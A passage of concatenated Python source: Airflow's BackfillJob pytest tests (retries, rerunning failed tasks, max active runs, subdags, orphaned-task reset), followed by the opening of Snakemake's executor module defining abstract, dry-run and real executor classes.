ti = TI(task=dag.get_task('test_backfill_rerun_upstream_failed_task-1'), execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.UPSTREAM_FAILED)
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=True,
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_upstream_failed_task-1'), execution_date=DEFAULT_DATE)
ti.refresh_from_db()
assert ti.state == State.SUCCESS
def test_backfill_rerun_failed_tasks_without_flag(self, dag_maker):
dag = self._get_dummy_dag(
dag_maker, dag_id='test_backfill_rerun_failed', task_id='test_backfill_rerun_failed_task-1'
)
dag_maker.create_dagrun(state=None)
executor = MockExecutor()
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_failed_task-1'), execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.FAILED)
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=False,
)
with pytest.raises(AirflowException):
job.run()
def test_backfill_retry_intermittent_failed_task(self, dag_maker):
with dag_maker(
dag_id='test_intermittent_failure_job',
schedule_interval="@daily",
default_args={
'retries': 2,
'retry_delay': datetime.timedelta(seconds=0),
},
) as dag:
task1 = DummyOperator(task_id="task1")
dag_maker.create_dagrun(state=None)
executor = MockExecutor(parallelism=16)
executor.mock_task_results[
TaskInstanceKey(dag.dag_id, task1.task_id, DEFAULT_DATE, try_number=1)
] = State.UP_FOR_RETRY
executor.mock_task_results[
TaskInstanceKey(dag.dag_id, task1.task_id, DEFAULT_DATE, try_number=2)
] = State.UP_FOR_RETRY
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
def test_backfill_retry_always_failed_task(self, dag_maker):
with dag_maker(
dag_id='test_always_failure_job',
schedule_interval="@daily",
default_args={
'retries': 1,
'retry_delay': datetime.timedelta(seconds=0),
},
) as dag:
task1 = DummyOperator(task_id="task1")
dr = dag_maker.create_dagrun(state=None)
executor = MockExecutor(parallelism=16)
executor.mock_task_results[
TaskInstanceKey(dag.dag_id, task1.task_id, dr.run_id, try_number=1)
] = State.UP_FOR_RETRY
executor.mock_task_fail(dag.dag_id, task1.task_id, dr.run_id, try_number=2)
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
)
with pytest.raises(BackfillUnfinished):
job.run()
def test_backfill_ordered_concurrent_execute(self, dag_maker):
with dag_maker(
dag_id='test_backfill_ordered_concurrent_execute',
schedule_interval="@daily",
) as dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op5 = DummyOperator(task_id='upstream_level_3')
# order randomly
op2.set_downstream(op3)
op1.set_downstream(op3)
op4.set_downstream(op5)
op3.set_downstream(op4)
runid0 = f'backfill__{DEFAULT_DATE.isoformat()}'
dag_maker.create_dagrun(run_id=runid0)
executor = MockExecutor(parallelism=16)
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
runid1 = f'backfill__{(DEFAULT_DATE + datetime.timedelta(days=1)).isoformat()}'
runid2 = f'backfill__{(DEFAULT_DATE + datetime.timedelta(days=2)).isoformat()}'
# test executor history keeps a list
history = executor.history
assert [sorted(item[-1].key[1:3] for item in batch) for batch in history] == [
[
('leave1', runid0),
('leave1', runid1),
('leave1', runid2),
('leave2', runid0),
('leave2', runid1),
('leave2', runid2),
],
[('upstream_level_1', runid0), ('upstream_level_1', runid1), ('upstream_level_1', runid2)],
[('upstream_level_2', runid0), ('upstream_level_2', runid1), ('upstream_level_2', runid2)],
[('upstream_level_3', runid0), ('upstream_level_3', runid1), ('upstream_level_3', runid2)],
]
def test_backfill_pooled_tasks(self):
"""
Test that queued tasks are executed by BackfillJob
"""
session = settings.Session()
pool = Pool(pool='test_backfill_pooled_task_pool', slots=1)
session.add(pool)
session.commit()
session.close()
dag = self.dagbag.get_dag('test_backfill_pooled_task_dag')
dag.clear()
executor = MockExecutor(do_update=True)
job = BackfillJob(dag=dag, start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, executor=executor)
# run with timeout because this creates an infinite loop if not
# caught
try:
with timeout(seconds=5):
job.run()
except AirflowTaskTimeout:
pass
ti = TI(task=dag.get_task('test_backfill_pooled_task'), execution_date=DEFAULT_DATE)
ti.refresh_from_db()
assert ti.state == State.SUCCESS
@pytest.mark.parametrize("ignore_depends_on_past", [True, False])
def test_backfill_depends_on_past_works_independently_on_ignore_depends_on_past(
self, ignore_depends_on_past
):
dag = self.dagbag.get_dag('test_depends_on_past')
dag.clear()
run_date = DEFAULT_DATE + datetime.timedelta(days=5)
BackfillJob(
dag=dag,
start_date=run_date,
end_date=run_date,
executor=MockExecutor(),
ignore_first_depends_on_past=ignore_depends_on_past,
).run()
# ti should have succeeded
ti = TI(dag.tasks[0], run_date)
ti.refresh_from_db()
assert ti.state == State.SUCCESS
def test_backfill_depends_on_past_backwards(self):
"""
Test that CLI respects -B argument and raises on interaction with depends_on_past
"""
dag_id = 'test_depends_on_past'
start_date = DEFAULT_DATE + datetime.timedelta(days=1)
end_date = start_date + datetime.timedelta(days=1)
kwargs = dict(
start_date=start_date,
end_date=end_date,
)
dag = self.dagbag.get_dag(dag_id)
dag.clear()
executor = MockExecutor()
job = BackfillJob(dag=dag, executor=executor, ignore_first_depends_on_past=True, **kwargs)
job.run()
ti = TI(dag.get_task('test_dop_task'), end_date)
ti.refresh_from_db()
# runs fine forwards
assert ti.state == State.SUCCESS
# raises backwards
expected_msg = 'You cannot backfill backwards because one or more tasks depend_on_past: test_dop_task'
with pytest.raises(AirflowException, match=expected_msg):
executor = MockExecutor()
job = BackfillJob(dag=dag, executor=executor, run_backwards=True, **kwargs)
job.run()
def test_cli_receives_delay_arg(self):
"""
Tests that the --delay argument is passed correctly to the BackfillJob
"""
dag_id = 'example_bash_operator'
run_date = DEFAULT_DATE
args = [
'dags',
'backfill',
dag_id,
'-s',
run_date.isoformat(),
'--delay-on-limit',
'0.5',
]
parsed_args = self.parser.parse_args(args)
assert 0.5 == parsed_args.delay_on_limit
def _get_dag_test_max_active_limits(
self, dag_maker_fixture, dag_id='test_dag', max_active_runs=1, **kwargs
):
with dag_maker_fixture(
dag_id=dag_id,
schedule_interval="@hourly",
max_active_runs=max_active_runs,
**kwargs,
) as dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op1 >> op2 >> op3
op4 >> op3
return dag
def test_backfill_max_limit_check_within_limit(self, dag_maker):
dag = self._get_dag_test_max_active_limits(
dag_maker, dag_id='test_backfill_max_limit_check_within_limit', max_active_runs=16
)
dag_maker.create_dagrun(state=None)
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
executor = MockExecutor()
job = BackfillJob(
dag=dag, start_date=start_date, end_date=end_date, executor=executor, donot_pickle=True
)
job.run()
dagruns = DagRun.find(dag_id=dag.dag_id)
assert 2 == len(dagruns)
assert all(run.state == State.SUCCESS for run in dagruns)
def test_backfill_max_limit_check(self, dag_maker):
dag_id = 'test_backfill_max_limit_check'
run_id = 'test_dag_run'
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
dag_run_created_cond = threading.Condition()
def run_backfill(cond):
cond.acquire()
# this session object is different than the one in the main thread
with create_session() as thread_session:
try:
dag = self._get_dag_test_max_active_limits(
dag_maker,
dag_id=dag_id,
)
dag_maker.create_dagrun(
state=None,
# Existing dagrun that is not within the backfill range
run_id=run_id,
execution_date=DEFAULT_DATE + datetime.timedelta(hours=1),
)
thread_session.commit()
cond.notify()
finally:
cond.release()
thread_session.close()
executor = MockExecutor()
job = BackfillJob(
dag=dag, start_date=start_date, end_date=end_date, executor=executor, donot_pickle=True
)
job.run()
backfill_job_thread = threading.Thread(
target=run_backfill, name="run_backfill", args=(dag_run_created_cond,)
)
dag_run_created_cond.acquire()
with create_session() as session:
backfill_job_thread.start()
try:
# at this point backfill can't run since the max_active_runs has been
# reached, so it is waiting
dag_run_created_cond.wait(timeout=1.5)
dagruns = DagRun.find(dag_id=dag_id)
assert 1 == len(dagruns)
dr = dagruns[0]
assert dr.run_id == run_id
# allow the backfill to execute
# by setting the existing dag run to SUCCESS,
# backfill will execute dag runs 1 by 1
dr.set_state(State.SUCCESS)
session.merge(dr)
session.commit()
backfill_job_thread.join()
dagruns = DagRun.find(dag_id=dag_id)
assert 3 == len(dagruns) # 2 from backfill + 1 existing
assert dagruns[-1].run_id == dr.run_id
finally:
dag_run_created_cond.release()
def test_backfill_max_limit_check_no_count_existing(self, dag_maker):
start_date = DEFAULT_DATE
end_date = DEFAULT_DATE
# Existing dagrun that is within the backfill range
dag = self._get_dag_test_max_active_limits(
dag_maker, dag_id='test_backfill_max_limit_check_no_count_existing'
)
dag_maker.create_dagrun(state=None)
executor = MockExecutor()
job = BackfillJob(
dag=dag, start_date=start_date, end_date=end_date, executor=executor, donot_pickle=True
)
job.run()
# BackfillJob will run since the existing DagRun does not count for the max
# active limit since it's within the backfill date range.
dagruns = DagRun.find(dag_id=dag.dag_id)
# will only be able to run 1 (the existing one) since there's just
# one dag run slot left given the max_active_runs limit
assert 1 == len(dagruns)
assert State.SUCCESS == dagruns[0].state
def test_backfill_max_limit_check_complete_loop(self, dag_maker):
dag = self._get_dag_test_max_active_limits(
dag_maker, dag_id='test_backfill_max_limit_check_complete_loop'
)
dag_maker.create_dagrun(state=None)
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
# Given the max limit to be 1 in active dag runs, we need to run the
# backfill job 3 times
success_expected = 2
executor = MockExecutor()
job = BackfillJob(
dag=dag, start_date=start_date, end_date=end_date, executor=executor, donot_pickle=True
)
job.run()
success_dagruns = len(DagRun.find(dag_id=dag.dag_id, state=State.SUCCESS))
running_dagruns = len(DagRun.find(dag_id=dag.dag_id, state=State.RUNNING))
assert success_expected == success_dagruns
assert 0 == running_dagruns # no dag_runs in running state are left
def test_sub_set_subdag(self, dag_maker):
with dag_maker(
'test_sub_set_subdag',
) as dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op5 = DummyOperator(task_id='upstream_level_3')
# order randomly
op2.set_downstream(op3)
op1.set_downstream(op3)
op4.set_downstream(op5)
op3.set_downstream(op4)
dr = dag_maker.create_dagrun(state=None)
executor = MockExecutor()
sub_dag = dag.partial_subset(
task_ids_or_regex="leave*", include_downstream=False, include_upstream=False
)
job = BackfillJob(dag=sub_dag, start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, executor=executor)
job.run()
for ti in dr.get_task_instances():
if ti.task_id == 'leave1' or ti.task_id == 'leave2':
assert State.SUCCESS == ti.state
else:
assert State.NONE == ti.state
def test_backfill_fill_blanks(self, dag_maker):
with dag_maker(
'test_backfill_fill_blanks',
) as dag:
op1 = DummyOperator(task_id='op1')
op2 = DummyOperator(task_id='op2')
op3 = DummyOperator(task_id='op3')
op4 = DummyOperator(task_id='op4')
op5 = DummyOperator(task_id='op5')
op6 = DummyOperator(task_id='op6')
dr = dag_maker.create_dagrun(state=None)
executor = MockExecutor()
session = settings.Session()
tis = dr.get_task_instances()
for ti in tis:
if ti.task_id == op1.task_id:
ti.state = State.UP_FOR_RETRY
ti.end_date = DEFAULT_DATE
elif ti.task_id == op2.task_id:
ti.state = State.FAILED
elif ti.task_id == op3.task_id:
ti.state = State.SKIPPED
elif ti.task_id == op4.task_id:
ti.state = State.SCHEDULED
elif ti.task_id == op5.task_id:
ti.state = State.UPSTREAM_FAILED
# op6 = None
session.merge(ti)
session.commit()
session.close()
job = BackfillJob(dag=dag, start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, executor=executor)
with pytest.raises(AirflowException, match='Some task instances failed'):
job.run()
dr.refresh_from_db()
assert dr.state == State.FAILED
tis = dr.get_task_instances()
for ti in tis:
if ti.task_id in (op1.task_id, op4.task_id, op6.task_id):
assert ti.state == State.SUCCESS
elif ti.task_id == op2.task_id:
assert ti.state == State.FAILED
elif ti.task_id == op3.task_id:
assert ti.state == State.SKIPPED
elif ti.task_id == op5.task_id:
assert ti.state == State.UPSTREAM_FAILED
def test_backfill_execute_subdag(self):
dag = self.dagbag.get_dag('example_subdag_operator')
subdag_op_task = dag.get_task('section-1')
subdag = subdag_op_task.subdag
subdag.timetable = cron_timetable('@daily')
start_date = timezone.utcnow()
executor = MockExecutor()
job = BackfillJob(
dag=subdag, start_date=start_date, end_date=start_date, executor=executor, donot_pickle=True
)
job.run()
subdag_op_task.pre_execute(context={'execution_date': start_date})
subdag_op_task.execute(context={'execution_date': start_date})
subdag_op_task.post_execute(context={'execution_date': start_date})
history = executor.history
subdag_history = history[0]
# check that all 5 task instances of the subdag 'section-1' were executed
assert 5 == len(subdag_history)
for sdh in subdag_history:
ti = sdh[3]
assert 'section-1-task-' in ti.task_id
with create_session() as session:
successful_subdag_runs = (
session.query(DagRun)
.filter(DagRun.dag_id == subdag.dag_id)
.filter(DagRun.execution_date == start_date)
.filter(DagRun.state == State.SUCCESS)
.count()
)
assert 1 == successful_subdag_runs
subdag.clear()
dag.clear()
def test_subdag_clear_parentdag_downstream_clear(self):
dag = self.dagbag.get_dag('clear_subdag_test_dag')
subdag_op_task = dag.get_task('daily_job')
subdag = subdag_op_task.subdag
executor = MockExecutor()
job = BackfillJob(
dag=dag, start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, executor=executor, donot_pickle=True
)
with timeout(seconds=30):
job.run()
ti_subdag = TI(task=dag.get_task('daily_job'), execution_date=DEFAULT_DATE)
ti_subdag.refresh_from_db()
assert ti_subdag.state == State.SUCCESS
ti_irrelevant = TI(task=dag.get_task('daily_job_irrelevant'), execution_date=DEFAULT_DATE)
ti_irrelevant.refresh_from_db()
assert ti_irrelevant.state == State.SUCCESS
ti_downstream = TI(task=dag.get_task('daily_job_downstream'), execution_date=DEFAULT_DATE)
ti_downstream.refresh_from_db()
assert ti_downstream.state == State.SUCCESS
sdag = subdag.partial_subset(
task_ids_or_regex='daily_job_subdag_task', include_downstream=True, include_upstream=False
)
sdag.clear(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, include_parentdag=True)
ti_subdag.refresh_from_db()
assert State.NONE == ti_subdag.state
ti_irrelevant.refresh_from_db()
assert State.SUCCESS == ti_irrelevant.state
ti_downstream.refresh_from_db()
assert State.NONE == ti_downstream.state
subdag.clear()
dag.clear()
def test_backfill_execute_subdag_with_removed_task(self):
"""
Ensure that subdag operators execute properly in the case where
an associated task of the subdag has been removed from the dag
definition, but has instances in the database from previous runs.
"""
dag = self.dagbag.get_dag('example_subdag_operator')
subdag = dag.get_task('section-1').subdag
session = settings.Session()
executor = MockExecutor()
job = BackfillJob(
dag=subdag, start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, executor=executor, donot_pickle=True
)
dr = DagRun(
dag_id=subdag.dag_id, execution_date=DEFAULT_DATE, run_id="test", run_type=DagRunType.BACKFILL_JOB
)
session.add(dr)
removed_task_ti = TI(
task=DummyOperator(task_id='removed_task'), run_id=dr.run_id, state=State.REMOVED
)
removed_task_ti.dag_id = subdag.dag_id
dr.task_instances.append(removed_task_ti)
session.commit()
with timeout(seconds=30):
job.run()
for task in subdag.tasks:
instance = (
session.query(TI)
.filter(
TI.dag_id == subdag.dag_id, TI.task_id == task.task_id, TI.execution_date == DEFAULT_DATE
)
.first()
)
assert instance is not None
assert instance.state == State.SUCCESS
removed_task_ti.refresh_from_db()
assert removed_task_ti.state == State.REMOVED
subdag.clear()
dag.clear()
def test_update_counters(self, dag_maker, session):
with dag_maker(dag_id='test_manage_executor_state', start_date=DEFAULT_DATE, session=session) as dag:
task1 = DummyOperator(task_id='dummy', owner='airflow')
dr = dag_maker.create_dagrun(state=None)
job = BackfillJob(dag=dag)
ti = TI(task1, dr.execution_date)
ti.refresh_from_db()
ti_status = BackfillJob._DagRunTaskStatus()
# test for success
ti.set_state(State.SUCCESS, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status, session=session)
assert len(ti_status.running) == 0
assert len(ti_status.succeeded) == 1
assert len(ti_status.skipped) == 0
assert len(ti_status.failed) == 0
assert len(ti_status.to_run) == 0
ti_status.succeeded.clear()
# test for skipped
ti.set_state(State.SKIPPED, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status, session=session)
assert len(ti_status.running) == 0
assert len(ti_status.succeeded) == 0
assert len(ti_status.skipped) == 1
assert len(ti_status.failed) == 0
assert len(ti_status.to_run) == 0
ti_status.skipped.clear()
# test for failed
ti.set_state(State.FAILED, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status, session=session)
assert len(ti_status.running) == 0
assert len(ti_status.succeeded) == 0
assert len(ti_status.skipped) == 0
assert len(ti_status.failed) == 1
assert len(ti_status.to_run) == 0
ti_status.failed.clear()
# test for retry
ti.set_state(State.UP_FOR_RETRY, session)
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status, session=session)
assert len(ti_status.running) == 0
assert len(ti_status.succeeded) == 0
assert len(ti_status.skipped) == 0
assert len(ti_status.failed) == 0
assert len(ti_status.to_run) == 1
ti_status.to_run.clear()
# test for reschedule
# For rescheduled state, tests that reduced_key is not
# used by upping try_number.
ti._try_number = 2
ti.set_state(State.UP_FOR_RESCHEDULE, session)
assert ti.try_number == 3 # see ti.try_number property in taskinstance module
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status, session=session)
assert len(ti_status.running) == 0
assert len(ti_status.succeeded) == 0
assert len(ti_status.skipped) == 0
assert len(ti_status.failed) == 0
assert len(ti_status.to_run) == 1
ti_status.to_run.clear()
# test for none
ti.set_state(State.NONE, session)
# Setting ti._try_number = 0 brings us to ti.try_number==1
# so that the reduced_key access will work fine
ti._try_number = 0
assert ti.try_number == 1 # see ti.try_number property in taskinstance module
session.merge(ti)
session.commit()
ti_status.running[ti.key] = ti
job._update_counters(ti_status=ti_status, session=session)
assert len(ti_status.running) == 0
assert len(ti_status.succeeded) == 0
assert len(ti_status.skipped) == 0
assert len(ti_status.failed) == 0
assert len(ti_status.to_run) == 1
ti_status.to_run.clear()
session.close()
def test_dag_dagrun_infos_between(self, dag_maker):
with dag_maker(
dag_id='dagrun_infos_between', start_date=DEFAULT_DATE, schedule_interval="@hourly"
) as test_dag:
DummyOperator(
task_id='dummy',
owner='airflow',
)
assert [DEFAULT_DATE] == [
info.logical_date
for info in test_dag.iter_dagrun_infos_between(
earliest=DEFAULT_DATE,
latest=DEFAULT_DATE,
)
]
assert [
DEFAULT_DATE - datetime.timedelta(hours=3),
DEFAULT_DATE - datetime.timedelta(hours=2),
DEFAULT_DATE - datetime.timedelta(hours=1),
DEFAULT_DATE,
] == [
info.logical_date
for info in test_dag.iter_dagrun_infos_between(
earliest=DEFAULT_DATE - datetime.timedelta(hours=3),
latest=DEFAULT_DATE,
)
]
def test_backfill_run_backwards(self):
dag = self.dagbag.get_dag("test_start_date_scheduling")
dag.clear()
executor = MockExecutor(parallelism=16)
job = BackfillJob(
executor=executor,
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=1),
run_backwards=True,
)
job.run()
session = settings.Session()
tis = (
session.query(TI)
.join(TI.dag_run)
.filter(TI.dag_id == 'test_start_date_scheduling' and TI.task_id == 'dummy')
.order_by(DagRun.execution_date)
.all()
)
queued_times = [ti.queued_dttm for ti in tis]
assert queued_times == sorted(queued_times, reverse=True)
assert all(ti.state == State.SUCCESS for ti in tis)
dag.clear()
session.close()
def test_reset_orphaned_tasks_with_orphans(self, dag_maker):
"""Create dagruns and ensure only ones with correct states are reset."""
prefix = 'backfill_job_test_test_reset_orphaned_tasks'
states = [State.QUEUED, State.SCHEDULED, State.NONE, State.RUNNING, State.SUCCESS]
states_to_reset = [State.QUEUED, State.SCHEDULED, State.NONE]
tasks = []
with dag_maker(dag_id=prefix) as dag:
for i in range(len(states)):
task_id = f"{prefix}_task_{i}"
task = DummyOperator(task_id=task_id)
tasks.append(task)
session = settings.Session()
job = BackfillJob(dag=dag)
# create dagruns
dr1 = dag_maker.create_dagrun(state=State.RUNNING)
dr2 = dag.create_dagrun(run_id='test2', state=State.SUCCESS)
# create taskinstances and set states
dr1_tis = []
dr2_tis = []
for i, (task, state) in enumerate(zip(tasks, states)):
ti1 = TI(task, dr1.execution_date)
ti2 = TI(task, dr2.execution_date)
ti1.refresh_from_db()
ti2.refresh_from_db()
ti1.state = state
ti2.state = state
dr1_tis.append(ti1)
dr2_tis.append(ti2)
session.merge(ti1)
session.merge(ti2)
session.commit()
assert 2 == job.reset_state_for_orphaned_tasks()
for ti in dr1_tis + dr2_tis:
ti.refresh_from_db()
# running dagrun should be reset
for state, ti in zip(states, dr1_tis):
if state in states_to_reset:
assert ti.state is None
else:
assert state == ti.state
# otherwise not
for state, ti in zip(states, dr2_tis):
assert state == ti.state
for state, ti in zip(states, dr1_tis):
ti.state = state
session.commit()
job.reset_state_for_orphaned_tasks(filter_by_dag_run=dr1, session=session)
# check same for dag_run version
for state, ti in zip(states, dr2_tis):
assert state == ti.state
def test_reset_orphaned_tasks_specified_dagrun(self, session, dag_maker):
"""Try to reset when we specify a dagrun and ensure nothing else is."""
dag_id = 'test_reset_orphaned_tasks_specified_dagrun'
task_id = dag_id + '_task'
with dag_maker(
dag_id=dag_id,
start_date=DEFAULT_DATE,
schedule_interval='@daily',
session=session,
) as dag:
DummyOperator(task_id=task_id, dag=dag)
job = BackfillJob(dag=dag)
# make two dagruns, only reset for one
dr1 = dag_maker.create_dagrun(state=State.SUCCESS)
dr2 = dag.create_dagrun(run_id='test2', state=State.RUNNING, session=session)
ti1 = dr1.get_task_instances(session=session)[0]
ti2 = dr2.get_task_instances(session=session)[0]
ti1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(dr1)
session.merge(dr2)
session.flush()
num_reset_tis = job.reset_state_for_orphaned_tasks(filter_by_dag_run=dr2, session=session)
assert 1 == num_reset_tis
ti1.refresh_from_db(session=session)
ti2.refresh_from_db(session=session)
assert State.SCHEDULED == ti1.state
assert State.NONE == ti2.state
def test_job_id_is_assigned_to_dag_run(self, dag_maker):
dag_id = 'test_job_id_is_assigned_to_dag_run'
with dag_maker(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily') as dag:
DummyOperator(task_id="dummy_task", dag=dag)
job = BackfillJob(
dag=dag, executor=MockExecutor(), start_date=timezone.utcnow() - datetime.timedelta(days=1)
)
job.run()
dr: DagRun = dag.get_last_dagrun()
assert dr.creating_job_id == job.id
def test_backfill_has_job_id(self):
"""Make sure that backfill jobs are assigned job_ids."""
dag = self.dagbag.get_dag("test_start_date_scheduling")
dag.clear()
executor = MockExecutor(parallelism=16)
job = BackfillJob(
executor=executor,
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=1),
run_backwards=True,
)
job.run()
assert executor.job_id is not None
@pytest.mark.long_running
@pytest.mark.parametrize("executor_name", ["SequentialExecutor", "DebugExecutor"])
@pytest.mark.parametrize("dag_id", ["test_mapped_classic", "test_mapped_taskflow"])
def test_mapped_dag(self, dag_id, executor_name):
"""
End-to-end test of a simple mapped dag.
We test with multiple executors as they have different "execution environments" -- for instance
DebugExecutor runs a lot more in the same process than other Executors.
"""
# This test needs a real executor to run, so that the `make_list` task can write out the TaskMap
from airflow.executors.executor_loader import ExecutorLoader
self.dagbag.process_file(str(TEST_DAGS_FOLDER / f'{dag_id}.py'))
dag = self.dagbag.get_dag(dag_id)
job = BackfillJob(
dag=dag,
start_date=days_ago(1),
end_date=days_ago(1),
donot_pickle=True,
executor=ExecutorLoader.load_executor(executor_name),
)
job.run()
|
__init__.py
|
__author__ = "Johannes Köster"
__copyright__ = "Copyright 2021, Johannes Köster"
__email__ = "johannes.koester@uni-due.de"
__license__ = "MIT"
import os
import sys
import contextlib
import time
import datetime
import json
import textwrap
import stat
import shutil
import shlex
import threading
import concurrent.futures
import subprocess
import signal
import tempfile
from functools import partial
from itertools import chain
from collections import namedtuple
from snakemake.io import _IOFile
import random
import base64
import uuid
import re
import math
from snakemake.jobs import Job
from snakemake.shell import shell
from snakemake.logging import logger
from snakemake.stats import Stats
from snakemake.utils import format, Unformattable, makedirs
from snakemake.io import get_wildcard_names, Wildcards
from snakemake.exceptions import print_exception, get_exception_origin
from snakemake.exceptions import format_error, RuleException, log_verbose_traceback
from snakemake.exceptions import (
ProtectedOutputException,
WorkflowError,
ImproperShadowException,
SpawnedJobError,
CacheMissException,
)
from snakemake.common import Mode, __version__, get_container_image, get_uuid
# TODO move each executor into a separate submodule
def sleep():
# do not sleep on CI. In that case we just want to quickly test everything.
if os.environ.get("CI") != "true":
time.sleep(10)
class AbstractExecutor:
def __init__(
self,
workflow,
dag,
printreason=False,
quiet=False,
printshellcmds=False,
printthreads=True,
latency_wait=3,
keepincomplete=False,
keepmetadata=True,
):
self.workflow = workflow
self.dag = dag
self.quiet = quiet
self.printreason = printreason
self.printshellcmds = printshellcmds
self.printthreads = printthreads
self.latency_wait = latency_wait
self.keepincomplete = keepincomplete
self.keepmetadata = keepmetadata
def get_default_remote_provider_args(self):
if self.workflow.default_remote_provider:
return (
" --default-remote-provider {} " "--default-remote-prefix {} "
).format(
self.workflow.default_remote_provider.__module__.split(".")[-1],
self.workflow.default_remote_prefix,
)
return ""
def _format_key_value_args(self, flag, kwargs):
if kwargs:
return " {} {} ".format(
flag,
" ".join("{}={}".format(key, value) for key, value in kwargs.items()),
)
return ""
def get_set_threads_args(self):
return self._format_key_value_args(
"--set-threads", self.workflow.overwrite_threads
)
def get_set_resources_args(self):
if self.workflow.overwrite_resources:
return " --set-resources {} ".format(
" ".join(
"{}:{}={}".format(rule, name, value)
for rule, res in self.workflow.overwrite_resources.items()
for name, value in res.items()
),
)
return ""
def get_set_scatter_args(self):
return self._format_key_value_args(
"--set-scatter", self.workflow.overwrite_scatter
)
def get_default_resources_args(self, default_resources=None):
if default_resources is None:
default_resources = self.workflow.default_resources
if default_resources:
def fmt(res):
if isinstance(res, str):
res = res.replace('"', r"\"")
return '"{}"'.format(res)
args = " --default-resources {} ".format(
" ".join(map(fmt, self.workflow.default_resources.args))
)
return args
return ""
def get_behavior_args(self):
if self.workflow.conda_not_block_search_path_envvars:
return " --conda-not-block-search-path-envvars "
return ""
def run_jobs(self, jobs, callback=None, submit_callback=None, error_callback=None):
"""Run a list of jobs that is ready at a given point in time.
By default, this method just runs each job individually.
This method can be overwritten to submit many jobs in a more efficient way than one-by-one.
Note that in any case, for each job, the callback functions have to be called individually!
"""
for job in jobs:
self.run(
job,
callback=callback,
submit_callback=submit_callback,
error_callback=error_callback,
)
def run(self, job, callback=None, submit_callback=None, error_callback=None):
"""Run a specific job or group job."""
self._run(job)
callback(job)
def shutdown(self):
pass
def cancel(self):
pass
def _run(self, job):
job.check_protected_output()
self.printjob(job)
def rule_prefix(self, job):
return "local " if job.is_local else ""
def printjob(self, job):
job.log_info(skip_dynamic=True)
def print_job_error(self, job, msg=None, **kwargs):
job.log_error(msg, **kwargs)
def handle_job_success(self, job):
pass
def handle_job_error(self, job):
pass
class DryrunExecutor(AbstractExecutor):
def printjob(self, job):
super().printjob(job)
if job.is_group():
for j in job.jobs:
self.printcache(j)
else:
self.printcache(job)
def printcache(self, job):
if self.workflow.is_cached_rule(job.rule):
if self.workflow.output_file_cache.exists(job):
logger.info(
"Output file {} will be obtained from global between-workflow cache.".format(
job.output[0]
)
)
else:
logger.info(
"Output file {} will be written to global between-workflow cache.".format(
job.output[0]
)
)
class RealExecutor(AbstractExecutor):
def __init__(
self,
workflow,
dag,
printreason=False,
quiet=False,
printshellcmds=False,
latency_wait=3,
assume_shared_fs=True,
keepincomplete=False,
keepmetadata=False,
):
super().__init__(
workflow,
dag,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
latency_wait=latency_wait,
keepincomplete=keepincomplete,
keepmetadata=keepmetadata,
)
self.assume_shared_fs = assume_shared_fs
self.stats = Stats()
self.snakefile = workflow.main_snakefile
def register_job(self, job):
job.register()
def _run(self, job, callback=None, error_callback=None):
super()._run(job)
self.stats.report_job_start(job)
try:
self.register_job(job)
except IOError as e:
logger.info(
"Failed to set marker file for job started ({}). "
"Snakemake will work, but cannot ensure that output files "
"are complete in case of a kill signal or power loss. "
"Please ensure write permissions for the "
"directory {}".format(e, self.workflow.persistence.path)
)
def handle_job_success(
self,
job,
upload_remote=True,
handle_log=True,
handle_touch=True,
ignore_missing_output=False,
):
job.postprocess(
upload_remote=upload_remote,
handle_log=handle_log,
handle_touch=handle_touch,
ignore_missing_output=ignore_missing_output,
latency_wait=self.latency_wait,
assume_shared_fs=self.assume_shared_fs,
keep_metadata=self.keepmetadata,
)
self.stats.report_job_end(job)
def handle_job_error(self, job, upload_remote=True):
job.postprocess(
error=True,
assume_shared_fs=self.assume_shared_fs,
latency_wait=self.latency_wait,
)
def get_additional_args(self):
